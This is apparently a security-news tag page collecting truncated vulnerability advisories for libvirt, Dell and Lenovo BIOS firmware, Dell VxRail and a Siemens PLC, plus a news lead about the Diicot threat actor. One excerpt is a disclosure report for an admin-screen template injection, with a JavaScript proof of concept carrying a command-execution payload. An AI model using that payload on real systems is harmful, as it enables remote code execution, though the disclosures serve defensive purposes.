#bios

An update for the virt:rhel and virt-devel:rhel modules is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-2700: A vulnerability was found in libvirt. This security flaw occurs due to repeatedly querying an SR-IOV PCI device's capabilities that exposes a memory leak caused by a failure to free the virPCIVirtualFunction array within the parent struct's g_autoptr cleanup.

A potential vulnerability in the LenovoFlashDeviceInterface SMI handler may allow an attacker with local access and elevated privileges to execute arbitrary code.

Dell BIOS contains an Out-of-bounds Write vulnerability. An unauthenticated physical attacker may potentially exploit this vulnerability, leading to denial of service.

Dell BIOS contains an Improper Input Validation vulnerability. An unauthenticated physical attacker may potentially exploit this vulnerability to perform arbitrary code execution.

Dell BIOS contains an improper authentication vulnerability. A locally authenticated malicious user may potentially exploit this vulnerability by bypassing certain authentication mechanisms in order to elevate privileges on the system.

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.

Dell VxRail, version(s) 8.0.100 and earlier contain a denial-of-service vulnerability in the upgrade functionality. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to degraded performance and system malfunction.

Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named Diicot, revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it's also the name of the Romanian organized crime and anti-terrorism policing unit," Cado Security said in a technical report. "In addition,

### Summary I found an RCE(Remote Code Execution) by SSTI in the admin screen. ### Details Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. ### PoC 1. Log in to the administrator screen and access the edit screen of the default page "Typography". (`http://127.0.0.1:8000/admin/pages/typography`) 2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed. ```js (async () => { const nonce = document.querySelector("input[name=admin-nonce]").value; const id = document.querySelector("input[name=__unique_form_id__]").value; const payload = "{{['id']|map('system')|join}}"; // SSTI Payload const params = new URLSearchParams(); params.append("task", "save"); params.append("data[header][title]", "poc"); params.append("data[content]", payload); params.append("data[folder]", "poc"); params.append("data[route]", "...

As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global). 1. EXECUTIVE SUMMARY CVSS v3 9.8  ATTENTION: Exploitable remotely / low attack complexity Vendor: Siemens Equipment: SIMATIC S7-1500 TM MFP Vulnerabilities: Improper Input Validation, Out-of-bounds Read, Use After Free, Out-of-bounds Write, Infinite Loop, Reachable Assertion, Off-by-one Error, Incorrect Default Permissions, Double Free, Improper Handling of Exceptional Conditions, Integer Overflow or Wraparound, NULL Pointer Dereference, Release of Invalid Pointer or Reference, Race Condition, Improper Restriction of Operations within the Bounds of a Memory Buffer, Non-exit on Failed Initialization, Missing Encryption of Sensitive Data, Classic Buffer Overflow, Uncontrolled Re...